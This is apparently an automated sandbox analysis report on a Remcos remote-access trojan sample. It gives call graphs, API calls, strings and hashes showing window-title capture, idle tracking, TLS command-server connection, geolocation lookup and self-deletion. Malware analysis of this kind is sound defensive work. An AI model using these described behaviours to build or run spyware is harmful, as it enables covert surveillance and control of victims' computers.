88331->88332 88438 440a4d 88332->88438 88334 440c7e 88334->87946 88336 40cc0d 88335->88336 88337 41246e 3 API calls 88336->88337 88339 40cc14 88337->88339 88338 40cc2c 88338->87946 88339->88338 88340 4124b7 3 API calls 88339->88340 88340->88338 88342 401f86 28 API calls 88341->88342 88343 41ae03 88342->88343 88343->87946 88345 41aed5 88344->88345 88346 401f86 28 API calls 88345->88346 88347 41aee7 88346->88347 88347->87946 88349 440c51 20 API calls 88348->88349 88350 41ad67 88349->88350 88351 401f66 28 API calls 88350->88351 88352 41ad75 88351->88352 88352->87946 88353->87967 88355 436050 ___scrt_fastfail 88354->88355 88356 41ac71 GetForegroundWindow GetWindowTextW 88355->88356 88357 403b40 28 API calls 88356->88357 88358 41ac9b 88357->88358 88358->87967 88360 401f66 28 API calls 88359->88360 88361 40e69e 88360->88361 88361->87967 88362->87967 88377 4045ec 88363->88377 88364 43a88c ___std_exception_copy 21 API calls 88364->88377 88366 40465b 88368 404666 88366->88368 88366->88377 88367 401f86 28 API calls 88367->88377 88455 4047eb 98 API calls 88368->88455 88369 401eef 11 API calls 88369->88377 88371 401eea 11 API calls 88371->88377 88372 40466d 88373 401eea 11 API calls 88372->88373 88374 404676 88373->88374 88375 401eea 11 API calls 88374->88375 88376 40467f 88375->88376 88376->87937 88377->88364 88377->88366 88377->88367 88377->88369 88377->88371 88443 404688 88377->88443 88454 40455b 57 API calls 88377->88454 88379->87946 88380->87937 88381->87937 88382->87967 88383->87937 88384->87937 88385->88242 88386->88249 88387->88259 88391 404b29 101 API calls 88388->88391 88390 404b26 88391->88390 88392->88276 88393->88269 88394->88298 88395->88311 88396->88309 88397->88279 88398->88287 88399->88327 88403 413619 88400->88403 88404 41362e ___scrt_initialize_default_local_stdio_options 88403->88404 88407 43e2dd 88404->88407 88410 43b030 88407->88410 88411 43b070 88410->88411 88412 43b058 88410->88412 88411->88412 88414 43b078 88411->88414 88432 445354 20 API calls _free 88412->88432 88433 4392de 35 API calls 3 library calls 88414->88433 88416 43b088 88434 43b7b6 20 API calls 2 library calls 88416->88434 88417 43b05d __fread_nolock 88425 433d2c 88417->88425 88420 43b100 88435 43be24 50 API calls 3 library calls 88420->88435 88421 41363c 88421->87946 88424 43b10b 88436 43b820 20 API calls _free 88424->88436 88426 433d37 IsProcessorFeaturePresent 88425->88426 88427 433d35 88425->88427 88429 4341a4 88426->88429 88427->88421 88437 434168 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 88429->88437 88431 434287 88431->88421 88432->88417 88433->88416 88434->88420 88435->88424 88436->88417 88437->88431 88439 440a64 88438->88439 88441 440a9b __fread_nolock 88439->88441 88442 445354 20 API calls _free 88439->88442 88441->88334 88442->88441 88450 4046a3 88443->88450 88444 4047d8 88445 401eea 11 API calls 88444->88445 88446 4047e1 88445->88446 88446->88366 88447 403b60 28 API calls 88447->88450 88448 401eef 11 API calls 88448->88450 88449 401eea 11 API calls 88449->88450 88450->88444 88450->88447 88450->88448 88450->88449 88451 401fbd 28 API calls 88450->88451 88452 401ebd 28 API calls 88450->88452 88451->88450 88453 404772 CreateEventA CreateThread WaitForSingleObject CloseHandle 88452->88453 88453->88450 88456 414b9b 88453->88456 88454->88377 88455->88372 88457 401fbd 28 API calls 88456->88457 88458 414bbd SetEvent 88457->88458 88459 414bd2 88458->88459 88460 403b60 28 API calls 88459->88460 88461 414bec 88460->88461 88462 401fbd 28 API calls 88461->88462 88463 414bfc 88462->88463 88464 401fbd 28 API calls 88463->88464 88465 414c0e 88464->88465 88466 41afc3 28 API calls 88465->88466 88467 414c17 88466->88467 88468 414db5 88467->88468 88470 414db0 88467->88470 88471 414c37 GetTickCount 88467->88471 88469 401d8c 11 API calls 88468->88469 88472 4161fb 88469->88472 88470->88468 88536 404ab1 88470->88536 88473 41ad46 28 API calls 88471->88473 88474 401eea 11 API calls 88472->88474 88475 414c4d 88473->88475 88477 416207 88474->88477 88535 41aca0 GetLastInputInfo GetTickCount 88475->88535 88479 401eea 11 API calls 88477->88479 88481 416213 88479->88481 88480 414c54 88482 41ad46 28 API calls 88480->88482 88483 414c5f 88482->88483 88484 41ac52 30 API calls 88483->88484 88485 414c6d 88484->88485 88486 41aec8 28 API calls 88485->88486 88487 414c7b 88486->88487 88488 401d64 28 API calls 88487->88488 88489 414c89 88488->88489 88546 4027ec 28 API calls 88489->88546 88491 414c97 88547 40275c 28 API calls 88491->88547 88493 414ca6 88494 4027cb 28 API calls 88493->88494 88495 414cb5 88494->88495 88548 40275c 28 API calls 88495->88548 88497 414cc4 88498 4027cb 28 API calls 88497->88498 88499 414cd0 88498->88499 88549 40275c 28 API calls 88499->88549 88501 414cda 88550 404468 61 API calls ctype 88501->88550 88503 414ce9 88504 401eea 11 API calls 88503->88504 88505 414cf2 88504->88505 88506 401eea 11 API calls 88505->88506 88507 414cfe 88506->88507 88508 401eea 11 API calls 88507->88508 88509 414d0a 88508->88509 88510 401eea 11 API calls 88509->88510 88511 414d16 88510->88511 88512 401eea 11 API calls 88511->88512 88513 414d22 88512->88513 88514 401eea 11 API calls 88513->88514 88515 414d2e 88514->88515 88516 401e13 11 API calls 88515->88516 88517 414d3a 88516->88517 88518 401eea 11 API calls 88517->88518 88519 414d43 88518->88519 88520 401eea 11 API calls 88519->88520 88521 414d4c 88520->88521 88522 401d64 28 API calls 88521->88522 88523 414d57 88522->88523 88524 43a5e7 _strftime 39 API calls 88523->88524 88525 414d64 88524->88525 88526 414d69 88525->88526 88527 414d8f 88525->88527 88529 414d82 88526->88529 88530 414d77 88526->88530 88528 401d64 28 API calls 88527->88528 88534 414d99 88528->88534 88531 404915 104 API calls 88529->88531 88551 4049ba 81 API calls 88530->88551 88533 414d7d 88531->88533 88533->88468 88534->88468 88534->88470 88535->88480 88537 404b17 88536->88537 88538 404aba 88536->88538 88537->88468 88539 404ae7 CreateEventA SetEvent WaitForSingleObject CloseHandle 88538->88539 88540 401f66 28 API calls 88538->88540 88539->88537 88541 404ad0 88540->88541 88542 401f66 28 API calls 88541->88542 88543 404adf 88542->88543 88544 41a686 79 API calls 88543->88544 88545 404ae4 88544->88545 88545->88539 88546->88491 88547->88493 88548->88497 88549->88501 88550->88503 88551->88533 88555 40e56a 88553->88555 88554 4124b7 3 API calls 88554->88555 88555->88554 88556 40e60e 88555->88556 88557 4082dc 28 API calls 88555->88557 88558 40e59c 88555->88558 88559 40e5fe Sleep 88555->88559 88562 41ae08 28 API calls 88555->88562 88566 412774 14 API calls 88555->88566 88568 401e13 11 API calls 88555->88568 88571 401f66 28 API calls 88555->88571 88575 4126d2 14 API calls 88555->88575 88560 4082dc 28 API calls 88556->88560 88557->88555 88586 40bf04 73 API calls ___scrt_fastfail 88558->88586 88559->88555 88563 40e619 88560->88563 88562->88555 88564 41ae08 28 API calls 88563->88564 88565 40e625 88564->88565 88567 412774 14 API calls 88565->88567 88566->88555 88569 40e638 88567->88569 88568->88555 88570 401e13 11 API calls 88569->88570 88572 40e644 88570->88572 88571->88555 88573 401f66 28 API calls 88572->88573 88574 40e655 88573->88574 88576 4126d2 14 API calls 88574->88576 88575->88555 88577 40e668 88576->88577 88587 411699 TerminateProcess WaitForSingleObject 88577->88587 88579 40e670 ExitProcess 88588 411637 62 API calls 88580->88588 88587->88579 88589 5f0000 88592 5f0006 88589->88592 88593 5f0015 88592->88593 88596 5f07a6 88593->88596 88597 5f07c1 88596->88597 88598 5f07ca CreateToolhelp32Snapshot 88597->88598 88599 5f07e6 Module32First 88597->88599 88598->88597 88598->88599 88600 5f07f5 88599->88600 88602 5f0005 88599->88602 88603 5f0465 88600->88603 88604 5f0490 88603->88604 88605 5f04d9 88604->88605 88606 5f04a1 VirtualAlloc 88604->88606 88605->88605 88606->88605

                                                  Executed Functions

                                                  Function 0040D767 Relevance: 95.3, APIs: 13, Strings: 41, Instructions: 799COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 80 40d9a5-40d9ac call 40bed7 69->80 81 40d96d-40d98c call 401e8f call 4124b7 69->81 70->69 101 40e134-40e154 call 401e8f call 412902 call 4112b5 70->101 89 40d9b5-40d9bc 80->89 90 40d9ae-40d9b0 80->90 81->80 97 40d98e-40d9a4 call 401e8f call 412902 81->97 95 40d9c0-40d9cc call 41a463 89->95 96 40d9be 89->96 94 40dc95 90->94 94->49 103 40d9d5-40d9d9 95->103 104 40d9ce-40d9d0 95->104 96->95 97->80 107 40da18-40da2b call 401d64 call 401e8f 103->107 108 40d9db call 40697b 103->108 104->103 127 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 107->127 128 40da2d call 4069ba 107->128 117 40d9e0-40d9e2 108->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->107 137 40da03-40da09 121->137 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 127->164 128->127 137->107 139 40da0b-40da11 137->139 139->107 142 40da13 call 4064d0 139->142 142->107 166 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->166 167 40db2c-40db33 163->167 164->163 191 40dad7-40db03 call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e 164->191 222 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 166->222 170 40dbb1-40dbbb call 4082d7 167->170 171 40db35-40dba7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 167->171 177 40dbc0-40dbe4 call 4022f8 call 4338c8 170->177 257 40dbac-40dbaf 171->257 198 40dbf3 177->198 199 40dbe6-40dbf1 call 436050 177->199 232 40db08-40db1d call 401e18 call 401e13 191->232 204 40dbf5-40dc40 call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 198->204 199->204 259 40dc45-40dc6a call 4338d1 call 401d64 call 40b125 204->259 273 40dd79-40dd7b 222->273 274 40dd5e 222->274 232->163 257->177 259->222 272 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 259->272 272->222 292 40dc93 272->292 275 40dd81 273->275 276 40dd7d-40dd7f 273->276 278 40dd60-40dd77 call 41beb0 CreateThread 274->278 279 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->279 276->278 278->279 330 40dea1 279->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 279->331 292->94 333 40dea3-40debb call 401d64 call 401e8f 330->333 331->333 343 40def9-40df0c call 401d64 call 401e8f 333->343 344 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 333->344 354 40df6c-40df7f call 401d64 call 401e8f 343->354 355 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 343->355 344->343 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 354->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 354->366 355->354 365->366 388 40dfe0-40dfe1 SetProcessDEPPolicy 366->388 389 40dfe3-40dff6 CreateThread 366->389 388->389 390 40e004-40e00b 389->390 391 40dff8-40e002 CreateThread 389->391 394 40e019-40e020 390->394 395 40e00d-40e017 CreateThread 390->395 391->390 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 399->404 413 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->413 414 40e12a-40e12f call 40cbac call 413fd4 401->414 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 413->433 414->101 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->414 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                                                  APIs
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\xenor\yavascript.exe,00000104), ref: 0040D790
                                                    • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                  • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\AppData\Roaming\xenor\yavascript.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-I7G983$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                  • API String ID: 2830904901-371293103
                                                  • Opcode ID: 00bd366c6a8d810e33445c196a5e90e33b50c9216c6e7ec08a6f25936d1f72b0
                                                  • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                  • Opcode Fuzzy Hash: 00bd366c6a8d810e33445c196a5e90e33b50c9216c6e7ec08a6f25936d1f72b0
                                                  • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E
                                                  Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                    • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                    • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                  • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                  • ExitProcess.KERNEL32 ref: 0040E672
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                  • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                  • API String ID: 2281282204-3981147832
                                                  • Opcode ID: 474c973623e238146e64abcd8053ae9bbd48680b8468997d14eb8def91a4fdd4
                                                  • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                  • Opcode Fuzzy Hash: 474c973623e238146e64abcd8053ae9bbd48680b8468997d14eb8def91a4fdd4
                                                  • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                  Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  • Opcode ID: b50e3ea1a872d37ae34c654cd7c515b10d61925b85636433c3a2d99c17233aa8
                                                  • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                  • Opcode Fuzzy Hash: b50e3ea1a872d37ae34c654cd7c515b10d61925b85636433c3a2d99c17233aa8
                                                  • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                  Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1023 40428c-4042ad connect 1024 4043e1-4043e5 1023->1024 1025 4042b3-4042b6 1023->1025 1026 4043e7-4043f5 WSAGetLastError 1024->1026 1027 40445f 1024->1027 1028 4043da-4043dc 1025->1028 1029 4042bc-4042bf 1025->1029 1026->1027 1030 4043f7-4043fa 1026->1030 1031 404461-404465 1027->1031 1028->1031 1032 4042c1-4042e8 call 404cbf call 401f66 call 41a686 1029->1032 1033 4042eb-4042f5 call 420151 1029->1033 1035 404439-40443e 1030->1035 1036 4043fc-404437 call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 1030->1036 1032->1033 1044 404306-404313 call 420373 1033->1044 1045 4042f7-404301 1033->1045 1041 404443-40445c call 401f66 * 2 call 41a686 1035->1041 1036->1027 1041->1027 1058 404315-404338 call 401f66 * 2 call 41a686 1044->1058 1059 40434c-404357 call 420f34 1044->1059 1045->1041 1084 40433b-404347 call 420191 1058->1084 1070 404389-404396 call 4202ea 1059->1070 1071 404359-404387 call 401f66 * 2 call 41a686 call 420592 1059->1071 1081 404398-4043bb call 401f66 * 2 call 41a686 1070->1081 1082 4043be-4043d7 CreateEventW * 2 1070->1082 1071->1084 1081->1082 1082->1028 1084->1027
                                                  APIs
                                                  • connect.WS2_32(?,0085D798,00000010), ref: 004042A5
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                  • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                  • API String ID: 994465650-2151626615
                                                  • Opcode ID: 2304213d53edfb56a495e9ef63ce110ebf6cc12a4635f112e08a4b6c9f2a5715
                                                  • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                  • Opcode Fuzzy Hash: 2304213d53edfb56a495e9ef63ce110ebf6cc12a4635f112e08a4b6c9f2a5715
                                                  • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF
                                                  Function 0041A51B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1311 41a51b-41a55a call 401faa call 43a88c InternetOpenW InternetOpenUrlW 1316 41a55c-41a57d InternetReadFile 1311->1316 1317 41a5a3-41a5a6 1316->1317 1318 41a57f-41a59f call 401f86 call 402f08 call 401eea 1316->1318 1320 41a5a8-41a5aa 1317->1320 1321 41a5ac-41a5b9 InternetCloseHandle * 2 call 43a887 1317->1321 1318->1317 1320->1316 1320->1321 1325 41a5be-41a5c8 1321->1325
                                                  APIs
                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                  Strings
                                                  • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                  • String ID: http://geoplugin.net/json.gp
                                                  • API String ID: 3121278467-91888290
                                                  • Opcode ID: 93c68c68fd3eadee9dae1c4fcccce0b07dd9aa7f001bde451803d805c4740930
                                                  • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                  • Opcode Fuzzy Hash: 93c68c68fd3eadee9dae1c4fcccce0b07dd9aa7f001bde451803d805c4740930
                                                  • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                  Function 0041A463 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                    • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                    • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                    • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                    • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                  • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                  • API String ID: 782494840-2070987746
                                                  • Opcode ID: 2ecf56d5918bcf6aac5f64e6b65e876b3c5a7effbb40a179cf39785145a79331
                                                  • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                  • Opcode Fuzzy Hash: 2ecf56d5918bcf6aac5f64e6b65e876b3c5a7effbb40a179cf39785145a79331
                                                  • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                  Function 004126D2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
